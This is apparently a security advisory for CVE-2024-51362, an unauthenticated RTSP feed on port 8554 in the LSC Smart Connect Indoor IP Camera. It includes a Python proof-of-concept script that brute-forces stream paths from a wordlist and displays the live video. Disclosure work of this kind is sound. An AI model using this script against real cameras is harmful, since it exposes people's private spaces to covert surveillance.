Vulnerability Type: Incorrect Access Control
Affected Product Code Base: Indoor IP Camera - V7.6.32
Affected Component: RTSP Protocol, Port 8554, Authentication Mechanism
Vendor: LSC Smart Connect
CVSS: 6.5 medium (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
In this article, we’ll discuss a critical vulnerability discovered in a popular IP camera that we purchased from Action. This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2024-51362.
A recently discovered vulnerability in the LSC Smart Connect Indoor IP Camera could allow unauthorized access to live camera footage if the camera is connected to an insecure network. This issue exposes users to privacy risks, as malicious actors can view the camera’s live feed without any credentials.
The vulnerability arises from an exposed RTSP (Real-Time Streaming Protocol) port, specifically port 8554, which allows remote access to the camera feed. Typically, users would only access the camera through the LSC Smart Home app, and nowhere in the product’s documentation does it mention the availability of the RTSP feed on this port. This means that many users are likely unaware of the risk, as they rely on the app for control and access.
RTSP is commonly used for streaming video feeds, and it requires authentication to prevent unauthorized access. However, in this case, the LSC Smart Connect Indoor IP Camera does not enforce any authentication on this port, allowing anyone on the same network as the device to view its live footage without restrictions.
# bruteforce script the directory for the rtsp stream
# The input file is a list of directories to try, you could use a wordlist from seclists
import cv2
import argparse
import socket
import time
def bf(ip_address, port, file):
# RTSP-stream URL
rtsp_ip = f"{ip_address}:{port}"
try:
# Attempt to create a socket connection with a timeout
print("Attempting to connect...")
socket.create_connection((ip_address, port), timeout=5)
print("Connection successful!")
except socket.timeout:
# If a timeout occurs, print a countdown
for remaining_time in range(5, 0, -1):
print(f"Time out in {remaining_time}")
time.sleep(1)
print("Timed out")
exit()
# Make a VideoCapture object to connect to the RTSP-stream
with open(file, 'r') as directories:
for directory in directories:
directory = directory.strip()
cap = cv2.VideoCapture(f"rtsp://{rtsp_ip}+{directory}")
# Check if the connection is opened
if cap.isOpened():
print(f"Connection successful with directory: {directory}")
break
print(f"Connection failed with directory: {directory}")
continue
# Loop to capture frames
while True:
ret, frame = cap.read()
# Check if the frame is successfully captured
if not ret:
print("Cannot capture frame.")
break
# Further processing of the frame can be done here (e.g., display)
cv2.imshow("RTSP Stream", frame)
# Press 'q' to exit the loop
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# Close the connection and windows
cap.release()
cv2.destroyAllWindows()
def main():
parser = argparse.ArgumentParser(description="Real Time Streaming Protocol (RTSP) Bruteforce directory script")
parser.add_argument("-ip", "--ip_address", type=str, required=True, help="the IP address")
parser.add_argument("-p", "--port", type=int, required=True, help="the port")
parser.add_argument("-f", "--file", type=str, required=True, help="path to file")
args = parser.parse_args()
bf(args.ip_address, args.port, args.file)
if __name__ == "__main__":
main()
If exploited, this vulnerability could allow attackers to gain unauthorized access to live video feeds from the affected camera. This could be used for various malicious purposes, including spying on individuals, monitoring private spaces, or conducting surveillance operations. The potential impact of this vulnerability is significant, as it compromises the privacy and security of users who rely on these cameras for monitoring and surveillance purposes.